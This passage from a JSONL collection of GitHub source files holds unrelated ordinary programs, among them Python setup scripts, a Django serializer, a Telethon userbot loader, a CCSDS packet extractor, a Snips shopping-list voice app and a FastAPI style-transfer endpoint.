print(\"---------------------------------\")\n # tree = AVL()\n # print(\"Tree before make_empty():\", tree)\n # tree.make_empty()\n # print(\"Tree after make_empty(): \", tree)\n","repo_name":"RobertSmith2727/261_Assignment_4_Assignment-4_BST-AVL_Tree_Implementation","sub_path":"avl.py","file_name":"avl.py","file_ext":"py","file_size_in_byte":18087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19463017003","text":"'''\nNapisz program zamieniający miejscami w zadanej liście liczb element największy z najmniejszym.\n\nna wejsciu: [49, 50, 20, 40, 35, 10]\n\nna wyjsciu: [49, 10, 20, 40, 35, 50]\n'''\n\nlista = [49, 50, 20, 40, 35, 10]\n\nmax_listy = max(lista)\nmin_listy = min(lista)\npierwszy_index_max_listy = lista.index(max_listy)\ndel lista[lista.index(max_listy)]\nlista.insert(lista.index(min_listy), max_listy)\ndel lista[lista.index(min_listy)]\nlista.insert(pierwszy_index_max_listy, min_listy)\n\nprint(lista)\n","repo_name":"Mati675/python_zadania","sub_path":"homework_1_mz/zad_2_5.py","file_name":"zad_2_5.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71102889709","text":"from rest_framework import serializers\nfrom .models import Sequence, User\n\nclass SequenceSerializer(serializers.ModelSerializer): # serializers.ModelSerializer just tells django to convert sql to JSON\n class Meta:\n model = Sequence # tell django which model to use\n fields = (\n 'id',\n 'name',\n 'tempo',\n \n 'poly0Steps',\n 'poly0Synth',\n 'poly0Volume',\n 'poly0Filter',\n 'poly0Dist',\n 'poly0Reverb',\n 'poly0Delay',\n\n 'poly1Steps',\n 'poly1Synth',\n 'poly1Volume',\n 'poly1Filter',\n 'poly1Dist',\n 'poly1Reverb',\n 'poly1Delay',\n\n 'poly2Steps',\n 'poly2Synth',\n 'poly2Volume',\n 'poly2Filter',\n 'poly2Dist',\n 'poly2Reverb',\n 'poly2Delay',) # tell django which fields to includeSequence\n\nclass UserSerializer(serializers.ModelSerializer):\n class Meta:\n model = User \n fields = ('id', 'email', 'password', 'username', 'location')\n","repo_name":"IntuitiveHarmony/breeze_back","sub_path":"breeze_api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24644852834","text":"import json\nimport xml.etree.ElementTree as ET\n\nfrom cafe.engine.models.base import AutoMarshallingDictModel\nfrom cloudcafe.compute.common.constants import Constants\n\n\nclass FlavorExtraSpecs(AutoMarshallingDictModel):\n\n @classmethod\n def _xml_to_obj(cls, serialized_str):\n element = ET.fromstring(serialized_str)\n cls._remove_xml_etree_namespace(element, Constants.XML_API_NAMESPACE)\n return cls._xml_ele_to_obj(element)\n\n @classmethod\n def _xml_ele_to_obj(cls, element):\n specs = FlavorExtraSpecs()\n specs_dict = {item.tag: item.text for item in element.getchildren()}\n specs.update(specs_dict)\n return specs\n\n @classmethod\n def _json_to_obj(cls, json_body):\n metadata = FlavorExtraSpecs()\n meta_contents = json.loads(json_body)\n metadata.update(meta_contents.get('extra_specs'))\n return metadata\n\n @classmethod\n def _dict_to_obj(cls, json_dict):\n specs = FlavorExtraSpecs()\n specs.update(json_dict)\n return 
specs\n","repo_name":"jcourtois/rpc9_cloudcafe","sub_path":"cloudcafe/compute/flavors_api/models/flavor_extra_specs.py","file_name":"flavor_extra_specs.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39176197802","text":"import glob\nimport os\nimport shutil\nfrom setuptools import setup, Extension, find_namespace_packages\n\nfrom Cython.Build import cythonize\n\n\ndef get_verified_absolute_path(path):\n    \"\"\"Verify and return absolute path of argument.\n\n    Args:\n        path : Relative/absolute path\n\n    Returns:\n        Absolute path\n    \"\"\"\n    installed_path = os.path.abspath(path)\n    if not os.path.exists(installed_path):\n        raise RuntimeError(\"No valid path for requested component exists\")\n    return installed_path\n\n\ndef get_installation_requirments(file_path):\n    \"\"\"Parse pip requirements file.\n\n    Args:\n        file_path : path to pip requirements file\n\n    Returns:\n        list of requirement strings\n    \"\"\"\n    with open(file_path, 'r') as file:\n        requirements_file_content = \\\n            [line.strip() for line in file if line.strip() and not line.lstrip().startswith('#')]\n    return requirements_file_content\n\n\ndef copy_all_files_in_directory(src, dest, file_ext=\"*.so\"):\n    \"\"\"Copy files with given extension from source to destination directories.\n\n    Args:\n        src : source directory\n        dest : destination directory\n        file_ext : a regular expression string capturing relevant files\n    \"\"\"\n    files_to_copy = glob.glob(os.path.join(src, file_ext))\n    if not files_to_copy:\n        raise RuntimeError(\"No {} files under {}\".format(file_ext, src))\n    os.makedirs(os.path.dirname(dest), exist_ok=True)\n    try:\n        for file in files_to_copy:\n            shutil.copy(file, dest)\n            print(\"{} was copied into {}\".format(file, dest))\n    except (shutil.Error, PermissionError) as err:\n        print('Could not copy {}. 
Error: {}'.format(file, err))\n        raise err\n\n\n# Must be set before calling pip\nfor envvar in ['CGA_INSTALL_DIR', 'CGA_VERSION']:\n    if envvar not in os.environ.keys():\n        raise EnvironmentError(\n            '{} environment variables must be set'.format(envvar))\n\ncga_install_dir = os.environ['CGA_INSTALL_DIR']\ncga_version = os.environ['CGA_VERSION']\n\n# Get current dir (pyclaragenomics folder is copied into a temp directory created by pip)\ncurrent_dir = os.path.dirname(os.path.realpath(__file__))\n\n\n# Copies shared libraries into claragenomics package\ncopy_all_files_in_directory(\n    get_verified_absolute_path(os.path.join(cga_install_dir, \"lib\")),\n    os.path.join(current_dir, \"claragenomics\", \"shared_libs/\"),\n)\n\n# Classifiers for PyPI\npycga_classifiers = [\n    \"Development Status :: 5 - Production/Stable\",\n    \"Intended Audience :: Science/Research\",\n    \"Topic :: Scientific/Engineering :: Bio-Informatics\",\n    \"License :: OSI Approved :: Apache Software License\",\n    \"Natural Language :: English\",\n    \"Operating System :: POSIX :: Linux\",\n    \"Programming Language :: Python :: 3.5\",\n    \"Programming Language :: Python :: 3.6\",\n    \"Programming Language :: Python :: 3.7\",\n    \"Programming Language :: Python :: 3.8\",\n    \"Programming Language :: Python :: 3.9\"\n]\n\nextensions = [\n    Extension(\n        \"claragenomics.bindings.cuda\",\n        sources=[os.path.join(\"claragenomics/**/cuda.pyx\")],\n        include_dirs=[\n            \"/usr/local/cuda/include\",\n        ],\n        library_dirs=[\"/usr/local/cuda/lib64\"],\n        runtime_library_dirs=[\"/usr/local/cuda/lib64\"],\n        libraries=[\"cudart\"],\n        language=\"c++\",\n        extra_compile_args=[\"-std=c++14\"],\n    ),\n    Extension(\n        \"claragenomics.bindings.cudapoa\",\n        sources=[os.path.join(\"claragenomics/**/cudapoa.pyx\")],\n        include_dirs=[\n            \"/usr/local/cuda/include\",\n            get_verified_absolute_path(os.path.join(cga_install_dir, \"include\")),\n        ],\n        library_dirs=[\"/usr/local/cuda/lib64\", get_verified_absolute_path(os.path.join(cga_install_dir, \"lib\"))],\n        runtime_library_dirs=[\"/usr/local/cuda/lib64\", os.path.join('$ORIGIN', os.pardir, 'shared_libs')],\n        libraries=[\"cudapoa\", \"cudart\", \"logging\"],\n        language=\"c++\",\n        extra_compile_args=[\"-std=c++14\"],\n    ),\n    Extension(\n        \"claragenomics.bindings.cudaaligner\",\n        sources=[os.path.join(\"claragenomics/**/cudaaligner.pyx\")],\n        include_dirs=[\n            \"/usr/local/cuda/include\",\n            get_verified_absolute_path(os.path.join(cga_install_dir, \"include\")),\n        ],\n        library_dirs=[\"/usr/local/cuda/lib64\", get_verified_absolute_path(os.path.join(cga_install_dir, \"lib\"))],\n        runtime_library_dirs=[\"/usr/local/cuda/lib64\", os.path.join('$ORIGIN', os.pardir, 'shared_libs')],\n        libraries=[\"cudaaligner\", \"cudart\", \"logging\"],\n        language=\"c++\",\n        extra_compile_args=[\"-std=c++14\"],\n    )\n]\n\nsetup(name='pyclaragenomics',\n      version=cga_version,\n      description='NVIDIA genomics python libraries and utilities',\n      author='NVIDIA Corporation',\n      url=\"https://github.com/clara-genomics/ClaraGenomicsAnalysis\",\n      include_package_data=True,\n      data_files=[\n          ('cga_shared_objects', glob.glob('claragenomics/shared_libs/*.so'))\n      ],\n      install_requires=get_installation_requirments(\n          get_verified_absolute_path(os.path.join(current_dir, 'requirements.txt'))\n      ),\n      packages=find_namespace_packages(where=current_dir, include=['claragenomics.*']),\n      python_requires='>=3.5',\n      license='Apache License 2.0',\n      long_description='Python libraries and utilities for manipulating genomics data',\n      classifiers=pycga_classifiers,\n      platforms=['any'],\n      
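# embedsignature=True is a Cython directive that bakes each function's Python\n      # signature into its docstring, so help() and IDEs can introspect the bindings.\n      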
ext_modules=cythonize(extensions, compiler_directives={'embedsignature': True}),\n scripts=[os.path.join('bin', 'genome_simulator'),\n os.path.join('bin', 'assembly_evaluator')],\n )\n","repo_name":"rodriguezjf/ClaraGenomicsAnalysis","sub_path":"pyclaragenomics/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":5698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"22944092196","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nwith open(\"requirements.txt\", \"r\") as fh:\n requirements = fh.read().splitlines()\n\nsetuptools.setup(\n name=\"flappy\",\n version=\"0.0.1\",\n author=\"Douglas Carvalho\",\n author_email=\"douglasc.dev@gmail.com\",\n description=\"A not very well coded flappy bird clone\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/douglas-cpp/flap.py\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n include_package_data=True,\n install_requires=requirements,\n python_requires='>=3.7',\n)\n","repo_name":"douglascdev/flap.py","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"30995864920","text":"import glob\nimport logging\nimport os\nimport sys\nfrom pathlib import Path\n\nfrom sample_config import Config\nfrom telethon.errors.rpcerrorlist import PhoneNumberInvalidError\n\nfrom userbot import bot\nfrom userbot.util import load_module, remove_plugin\n\nlogging.basicConfig(format='[%(levelname) 5s/%(asctime)s] %(name)s: %(message)s',\n level=logging.WARNING)\nlogger = logging.getLogger(__name__)\n\nINVALID_PH = '\\nERROR: The phone no. entered is incorrect' \\\n '\\n Tip: Use country code (eg +44) along with num.' 
\\\n '\\n Recheck your phone number'\n\ntry:\n bot.start()\nexcept PhoneNumberInvalidError:\n print(INVALID_PH)\n sys.exit(1)\n\nNO_LOAD = Config.NO_LOAD\npath = 'userbot/modules/*.py'\nfiles = glob.glob(path)\nfor name in files:\n with open(name) as f:\n path1 = Path(f.name)\n shortname = path1.stem\n load_module(shortname.replace(\".py\", \"\"))\nfor noload in NO_LOAD:\n remove_plugin(noload)\n print(f\"Removed plugin {noload}\")\n\n\nSEM_TEST = os.environ.get(\"SEMAPHORE\", None)\nif SEM_TEST:\n bot.disconnect()\nelse:\n bot.run_until_disconnected()\n","repo_name":"muhammedfurkan/TelethonUserBot","sub_path":"userbot/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"37"} +{"seq_id":"28788666117","text":"import ccsds\n\nimport sys\nimport pathlib\nimport functools\nimport pickle\nimport ctypes\n\nlibfec = ctypes.CDLL('libfec.so')\n\ndef usage():\n print(f'Usage: {sys.argv[0]} input_file format output_dir')\n print()\n print('Format can be either full or short')\n print(\"\"\"Full indicates a file format which is a concatenation of\n256 byte frames composed by the 4 byte CCSDS syncword, 220 bytes of\nuseful data (which is an AOS Space Data Link frame) and 32 Reed-Solomon\nparity check bytes (which are ignored here).\n\nShort indicates a file format which is a concatenation of 220 byte\nframes composed only by the useful data.\"\"\")\n\ndef read_frame(f, frame_type):\n frame_size = 220 if frame_type == 'short' else 256\n while True:\n b = f.read(frame_size)\n if not b:\n return\n if frame_type == 'full':\n b = b[4:] # drop ASM\n if libfec.decode_rs_8(b, 0, 0, 3) < 0:\n # frame has uncorrectable errors\n continue\n b = b[:-32] # drop RS parity check bytes\n yield ccsds.AOSFrame.parse(b)\n\ndef main():\n if len(sys.argv) != 4:\n usage()\n exit(1)\n\n frame_type = sys.argv[2]\n if frame_type not in ['full', 'short']:\n usage()\n exit(1)\n\n\n infile = pathlib.Path(sys.argv[1])\n f = open(sys.argv[1], 'rb')\n frames = read_frame(f, frame_type)\n\n outdir = pathlib.Path(sys.argv[3])\n\n packets = list(ccsds.extract_space_packets(frames, 245, 1, get_timestamps = True))\n apids = [ccsds.SpacePacketPrimaryHeader.parse(p[0]).APID for p in packets]\n by_apid = {apid : [p for a,p in zip(apids, packets) if a == apid]\n for apid in set(apids)}\n\n for a, ps in by_apid.items():\n apid_dir = outdir / f'APID_{a}'\n apid_dir.mkdir(parents = True, exist_ok = True)\n fname = apid_dir / infile.name\n with open(fname, 'wb') as f:\n pickle.dump(ps, f) \n\nif __name__ == '__main__':\n main()\n","repo_name":"daniestevez/jupyter_notebooks","sub_path":"Tianwen/space_packet_extract.py","file_name":"space_packet_extract.py","file_ext":"py","file_size_in_byte":1974,"program_lang":"python","lang":"en","doc_type":"code","stars":124,"dataset":"github-code","pt":"37"} +{"seq_id":"34854530035","text":"#User function Template for python3\n\nclass Solution:\n def findPath(self, mat, n):\n # code here\n lst=[]\n def func(i,j,st,mat,vis):\n n=len(mat)\n m=len(mat[0])\n if i<0 or j<0 or i>=n or j>=m:\n return \n if i==n-1 and j==m-1 and mat[i][j]==1:\n lst.append(st)\n return\n if mat[i][j]==1 and not vis[i][j]:\n vis[i][j]=1\n func(i,j+1,st+'R',mat,vis)\n func(i,j-1,st+'L',mat,vis)\n func(i+1,j,st+'D',mat,vis)\n func(i-1,j,st+'U',mat,vis)\n vis[i][j]=0\n vis=[[0 for i in range(len(mat[0]))] for j in range(len(mat))]\n func(0,0,'',mat,vis)\n return lst\n\n#{ \n # Driver Code Starts\n#Initial Template for 
Python 3\n\nif __name__=='__main__':\n t = int(input())\n for i in range(t):\n n = list(map(int, input().strip().split()))\n arr = list(map(int, input().strip().split()))\n \n matrix = [[0 for i in range(n[0])]for j in range(n[0])]\n k=0\n for i in range(n[0]):\n for j in range(n[0]):\n matrix[i][j] = arr[k]\n k+=1\n ob = Solution()\n result = ob.findPath(matrix, n[0])\n result.sort()\n if len(result) == 0 :\n print(-1)\n else:\n for x in result:\n print(x,end = \" \")\n print()\n# } Driver Code Ends","repo_name":"Durgaprasad-kakarla/Geeks-for-Geeks","sub_path":"Medium/Rat in a Maze Problem - I/rat-in-a-maze-problem-i.py","file_name":"rat-in-a-maze-problem-i.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13363953103","text":"# -*- coding: UTF-8 -*-\n\nfrom type_define import *\nfrom utils import *\n\nTYPE = XLS\n\nDEFINE = (\n\t('是否导表', '_exp_flag', Bool, OPTIONAL(False)),\n\t('场景id', 'id', Int, REQUIRED),\n\t('入口坐标', 'born_pos', Tuple(Int,Int), REQUIRED),\n\t('场景宽度', 'width', Int, REQUIRED),\n\t('场景高度', 'height', Int, REQUIRED),\n\t('台阶文件名', 'floot_file', String, REQUIRED),\n\t('台阶对象层名', 'floot', String, REQUIRED),\n\t('背景文件名', 'bg_json', String, REQUIRED),\n\t('背景音乐名', 'bg_music', String, REQUIRED),\n\t('头像坐标', 'head_portrait_pos', Tuple(Int,Int), REQUIRED),\n\t('背景的tag值', 'root_tag', Int, REQUIRED),\n\t('0层速率', 'sr_0', Float, REQUIRED),\n\t('01层速率', 'sr_01', Float, REQUIRED),\n\t('02层速率', 'sr_02', Float, REQUIRED),\n\t('03层速率', 'sr_03', Float, REQUIRED),\n\t('04层速率', 'sr_04', Float, REQUIRED),\n\t('05层速率', 'sr_05', Float, REQUIRED),\n\t('场景动画', 'scene_anims', Array(String), OPTIONAL),\n)\n\nimport time\n\ndef export(old, new, depend, raw):\n\treturn new\n","repo_name":"winiceo/release_project","sub_path":"tools/exporter/exporter/exporters/scene.py","file_name":"scene.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9074984887","text":"import FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process(\"Demo\")\n\nprocess.load(\"FWCore.MessageService.MessageLogger_cfi\")\n\nprocess.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(100) )\n\nprocess.source = cms.Source(\"PoolSource\",\n # replace 'myfile.root' with the source file you want to use\n fileNames = cms.untracked.vstring(\n #'file:myfile.root'\n #'root://cmsxrootd.fnal.gov///store/mc/RunIIFall15MiniAODv1/RSGravToGG_kMpl-001_M-1000_TuneCUEP8M1_13TeV-pythia8/MINIAODSIM/PU25nsData2015v1_76X_mcRun2_asymptotic_v12-v1/20000/784A23B1-2DAE-E511-83F0-00266CF89498.root'\n 'root://cmsxrootd.fnal.gov//store/mc/RunIIFall15MiniAODv2/RSGravToGG_kMpl-001_M-1500_TuneCUEP8M1_13TeV-pythia8/MINIAODSIM/PU25nsData2015v1_76X_mcRun2_asymptotic_v12-v1/50000/34B117D8-C1B8-E511-B935-782BCB20EDD2.root'\n )\n)\n\nprocess.load('Configuration/StandardSequences/FrontierConditions_GlobalTag_cff')\nprocess.GlobalTag.globaltag = '76X_mcRun2_asymptotic_v12'\n\nprocess.load(\"Configuration.StandardSequences.GeometryDB_cff\")\n#process.load(\"Geometry.CMSCommonData.cmsIdealGeometryXML_cfi\");\n#process.load(\"Geometry.CaloEventSetup.CaloGeometry_cfi\");\n#process.load(\"Geometry.CaloEventSetup.CaloTopology_cfi\");\n\nprocess.demo = cms.EDAnalyzer(\n'ExoDiPhotonAnalyzer',\nphotonsMiniAOD = cms.InputTag(\"slimmedPhotons\"),\ngenParticlesMiniAOD = cms.InputTag(\"prunedGenParticles\"),\nrho = 
cms.InputTag(\"fixedGridRhoFastjetAll\")\n)\n\nprocess.TFileService = cms.Service(\"TFileService\",\n fileName = cms.string(\"ExoDiphotonAnalyzer.root\")\n )\n\nprocess.p = cms.Path(process.demo)\n","repo_name":"abuccilli/diphoton-analysis","sub_path":"ExoDiPhotonAnalyzer/python/ConfFile_cfg.py","file_name":"ConfFile_cfg.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26055470004","text":"# 저울 # B_2437\nimport sys\ninput = sys.stdin.readline\n\nn = int(input())\nw = list(map(int, input().split()))\nw.sort() # 오름차순 정렬\nresult = 0\n\nfor i in range(n):\n # 추의 무게가 'result+1'의 값보다 크다면 최솟값\n if w[i] > result+1:\n break\n # 그렇지 않다면 result에 추의 무게를 더함\n # 그냥 result로 했을 때에는 모든 최솟값의 경우의 수를 검사 못함\n result += w[i]\n\nprint(result+1)","repo_name":"snowedev/baekjoon-code.plus","sub_path":"baekjoon/[greedy]/[greedy]저울.py","file_name":"[greedy]저울.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72778051628","text":"#!/usr/bin/env python3.7\n# -*- coding: utf-8 -*-\n\nfrom hermes_python.hermes import Hermes\nfrom snipsTools import SnipsConfigParser\nimport const\nfrom utils import (\n get_shopping_list,\n extract_nom,\n extract_media,\n extract_items,\n save_shopping_list,\n send_mail,\n get_message_tosend,\n)\n\nimport logging\nfrom logging.handlers import RotatingFileHandler\n\nCONFIG_INI = \"config.ini\"\n\n\nclass ShoppingList(object):\n \"\"\"\n Class used to wrap action code with mqtt connection\n \"\"\"\n\n def __init__(self):\n self.start_blocking()\n\n @staticmethod\n def terminate_feedback(hermes, intent_message, mode=\"default\"):\n \"\"\"\n feedback reply // future function\n :param hermes:\n :param intent_message:\n :param mode:\n \"\"\"\n if mode == \"default\":\n hermes.publish_end_session(intent_message.session_id, \"\")\n else:\n hermes.publish_end_session(intent_message.session_id, \"\")\n\n def intent_add_callback(self, hermes, intent_message):\n \"\"\"\n callback function, to the addItemOnShoppingList intent\n\n :param hermes:\n :param intent_message:\n \"\"\"\n\n # action code goes here...\n receivedMessage = \"[Received] intent: {}\".format(\n intent_message.intent.intent_name\n )\n logger.info(receivedMessage)\n confidenceMessage = \"[Received] confidence: : \" + str(\n intent_message.intent.confidence_score\n )\n logger.info(confidenceMessage)\n\n itemsToAdd = extract_items(intent_message)\n texttospeak = \"\"\n\n for item in itemsToAdd:\n if item not in listDeCourses:\n listDeCourses.append(item)\n texttospeak = texttospeak + item + \", \"\n\n messagetospeak = const.ADD_OK.format(texttospeak=texttospeak)\n\n logger.info(messagetospeak)\n\n self.terminate_feedback(hermes, intent_message)\n # speak the execution result by tts\n hermes.publish_start_session_notification(\n intent_message.site_id, messagetospeak, \"Shopping_list_APP\"\n )\n\n def intent_delete_callback(self, hermes, intent_message):\n \"\"\"\n callback function, to the deleteItemOnShoppingList intent\n\n :param hermes:\n :param intent_message:\n \"\"\"\n\n # action code ...\n receivedMessage = \"[Received] intent: {}\".format(\n intent_message.intent.intent_name\n )\n logger.info(receivedMessage)\n confidenceMessage = \"[Received] confidence: : \" + str(\n intent_message.intent.confidence_score\n )\n logger.info(confidenceMessage)\n\n texttospeak = \"\"\n itemsToDel = extract_items(intent_message)\n for item 
in itemsToDel:\n            if item in listDeCourses:\n                listDeCourses.remove(item)\n                texttospeak = texttospeak + item + \", \"\n\n        messagetospeak = const.DEL_OK.format(texttospeak=texttospeak)\n        logger.info(messagetospeak)\n\n        self.terminate_feedback(hermes, intent_message)\n        # speak the execution result by tts\n        hermes.publish_start_session_notification(\n            intent_message.site_id, messagetospeak, \"Shopping_list_APP\"\n        )\n\n    def intent_flush_callback(self, hermes, intent_message):\n        \"\"\"\n        callback function, to the flushShoppingList intent\n\n        :param hermes:\n        :param intent_message:\n        \"\"\"\n        # action code ...\n        receivedMessage = \"[Received] intent: {}\".format(\n            intent_message.intent.intent_name\n        )\n        logger.info(receivedMessage)\n        confidenceMessage = \"[Received] confidence: \" + str(\n            intent_message.intent.confidence_score\n        )\n        logger.info(confidenceMessage)\n\n        lengthlist = len(listDeCourses)\n        texttospeak = \"\"\n        # iterate over a copy so removing items does not skip every other entry\n        for item in list(listDeCourses):\n            listDeCourses.remove(item)\n            texttospeak = texttospeak + item + \", \"\n\n        messagetospeak = const.FLUSH_OK.format(\n            length=lengthlist, texttospeak=texttospeak\n        )\n        logger.info(messagetospeak)\n\n        self.terminate_feedback(hermes, intent_message)\n        # speak the execution result by tts\n        hermes.publish_start_session_notification(\n            intent_message.site_id, messagetospeak, \"Shopping_list_APP\"\n        )\n\n    def intent_list_callback(self, hermes, intent_message):\n        \"\"\"\n        callback function, to the itemsOnShoppingList intent\n\n        :param hermes:\n        :param intent_message:\n        \"\"\"\n        # action code ...\n        receivedMessage = \"[Received] intent: {}\".format(\n            intent_message.intent.intent_name\n        )\n        logger.info(receivedMessage)\n        confidenceMessage = \"[Received] confidence: \" + str(\n            intent_message.intent.confidence_score\n        )\n        logger.info(confidenceMessage)\n\n        texttospeak = \"\"\n        lengthlist = len(listDeCourses)\n        if lengthlist == 0:\n            messagetospeak = const.LIST_VIDE\n        else:\n            for item in listDeCourses:\n                texttospeak = texttospeak + item + \", \"\n\n            messagetospeak = const.LIST_OK.format(\n                length=lengthlist, texttospeak=texttospeak\n            )\n\n        logger.info(messagetospeak)\n\n        self.terminate_feedback(hermes, intent_message)\n        # speak the execution result by tts\n        hermes.publish_start_session_notification(\n            intent_message.site_id, messagetospeak, \"Shopping_list_APP\"\n        )\n\n    def intent_print_callback(self, hermes, intent_message):\n        \"\"\"\n        callback function, to the printShoppingList intent\n\n        :param hermes:\n        :param intent_message:\n        \"\"\"\n\n        if len(listDeCourses) == 0:\n            messagetospeak = const.PRINT_VIDE\n        else:\n            save_shopping_list(listDeCourses)\n            messagetospeak = const.PRINT_OK.format(imp=\"\")\n\n        logger.info(messagetospeak)\n\n        self.terminate_feedback(hermes, intent_message)\n        # speak the execution result by tts\n        hermes.publish_start_session_notification(\n            intent_message.site_id, messagetospeak, \"Shopping_list_APP\"\n        )\n\n    def intent_send_callback(self, hermes, intent_message):\n        \"\"\"\n        callback function, to the sendShoppingList intent\n\n        :param hermes:\n        :param intent_message:\n        \"\"\"\n\n        media = extract_media(intent_message, \"mail\")\n        user = extract_nom(intent_message, \"Alain\")\n\n        if len(listDeCourses) == 0:\n            messagetospeak = const.SENT_VIDE\n        else:\n            save_shopping_list(listDeCourses)\n            msgToSend = get_message_tosend(listDeCourses)\n            response = send_mail(\n                SMTP_ADDR, SMTP_PORT, LOGIN, PASSWD, MAIL_FROM, MAIL_TO, msgToSend\n            )\n            if response == \"\":\n                messagetospeak = const.SENT_OK.format(media=media, user=user)\n            else:\n                messagetospeak = 
const.SENT_KO.format(media=media, user=user)\n\n        logger.info(messagetospeak)\n\n        self.terminate_feedback(hermes, intent_message)\n        # speak the execution result by tts\n        hermes.publish_start_session_notification(\n            intent_message.site_id, messagetospeak, \"Shopping_list_APP\"\n        )\n\n    def master_intent_callback(self, hermes, intent_message):\n        \"\"\"\n        Master callback function, triggered every time an intent is recognized\n        :param hermes:\n        :param intent_message:\n        \"\"\"\n        coming_intent = intent_message.intent.intent_name\n        if coming_intent == \"Rdlc14:addItemOnShoppingList\":\n            self.intent_add_callback(hermes, intent_message)\n        if coming_intent == \"Rdlc14:deleteItemOnShoppingList\":\n            self.intent_delete_callback(hermes, intent_message)\n        if coming_intent == \"Rdlc14:itemsOnShoppingList\":\n            self.intent_list_callback(hermes, intent_message)\n        if coming_intent == \"Rdlc14:flushShoppingList\":\n            self.intent_flush_callback(hermes, intent_message)\n        if coming_intent == \"Rdlc14:printShoppingList\":\n            self.intent_print_callback(hermes, intent_message)\n        if coming_intent == \"Rdlc14:sendShoppingList\":\n            self.intent_send_callback(hermes, intent_message)\n\n    def start_blocking(self):\n        \"\"\"\n        Register callback function and start MQTT bus.\n        \"\"\"\n        logger.info(\"...myShoppingList...\")\n        logger.info(\"Connecting to MQTT broker \" + MQTT_ADDR)\n\n        with Hermes(MQTT_ADDR) as h:\n            h.subscribe_intents(self.master_intent_callback).start()\n\n\n# main function\n\n\nif __name__ == \"__main__\":\n    try:\n        config = SnipsConfigParser.read_configuration_file(CONFIG_INI)\n\n    except:\n        print(\"config --> empty\")\n        config = None\n\n    MQTT_IP_ADDR = config[\"global\"].get(\"mqtt_host\")\n    MQTT_PORT = config[\"global\"].get(\"mqtt_port\")\n    MQTT_ADDR = \"{}:{}\".format(MQTT_IP_ADDR, str(MQTT_PORT))\n\n    MEDIA = config[\"media\"].get(\"default_media\")\n    USERNAME = config[\"mail\"].get(\"default_user\")\n    MAIL_TO = config[\"mail\"].get(\"mail_default_user\")\n    SMTP_ADDR = config[\"mail\"].get(\"smtp_server\")\n    SMTP_PORT = config[\"mail\"].get(\"smtp_port\")\n    LOGIN = config[\"mail\"].get(\"smtp_login\")\n    PASSWD = config[\"mail\"].get(\"smtp_passwd\")\n    MAIL_FROM = config[\"mail\"].get(\"mail_from\")\n\n    PRINTER = config[\"printer\"].get(\"default_printer\")\n\n    locale = config[\"global\"].get(\"locale\")\n\n    # logging config\n    logging.basicConfig(\n        format=\"%(asctime)s - [%(levelname)s] - %(message)s\",\n        level=logging.INFO,\n        filename=\"myShoppingList.log\",\n        filemode=\"w\",\n    )\n\n    logger = logging.getLogger(\"myShoppingList\")\n    handler = logging.StreamHandler()\n    file_handler = RotatingFileHandler(\n        \"/var/log/supervisor/assistants/shoppinglist/myshoppinglist.log\",\n        maxBytes=10000,\n        backupCount=3,\n    )\n    logger.addHandler(file_handler)\n    logger.addHandler(handler)\n    logger.setLevel(logging.INFO)\n\n    # get the shopping list\n    listDeCourses = get_shopping_list()\n\n    resultToSpeak = \"\"\n\n    try:\n        ShoppingList()\n\n    except KeyboardInterrupt:\n        logger.info(\"...myShoppingList --> stop ...\")\n","repo_name":"jeedom-rdlc14/snips-app-myShoppingList","sub_path":"app_shoppingList.py","file_name":"app_shoppingList.py","file_ext":"py","file_size_in_byte":10385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9463278249","text":"import base64\nfrom io import BytesIO\n\nfrom fastapi import FastAPI, Request, UploadFile, File\nfrom fastapi.responses import HTMLResponse\nfrom fastapi.templating import Jinja2Templates\nfrom PIL import Image\n\nfrom 
style_transfer_nn import get_config, prepare_config_to_predict, train\n\napp = FastAPI()\n\ntemplates = Jinja2Templates(directory=\"templates\")\n\n\n@app.get(\"/\", response_class=HTMLResponse)\nasync def root(request: Request):\n return templates.TemplateResponse(\"index.html\", {\"request\": request})\n\n\n@app.post(\"/\")\nasync def root(request: Request, content_image: UploadFile = File(...)):\n print(content_image.filename)\n return {\"ok\": \"ok\"}\n\n\n@app.post(\"/upload\")\nasync def upload_img(\n request: Request,\n content_image: UploadFile = File(...),\n style_image: UploadFile = File(...)\n):\n content_image_bites = await content_image.read()\n style_image_bites = await style_image.read()\n config = get_config()\n config = prepare_config_to_predict(\n config,\n Image.open(BytesIO(content_image_bites)).convert('RGB'),\n Image.open(BytesIO(style_image_bites)).convert('RGB')\n )\n train(config)\n buffered = BytesIO()\n config[\"result_images\"][-1].save(buffered, format=\"JPEG\")\n 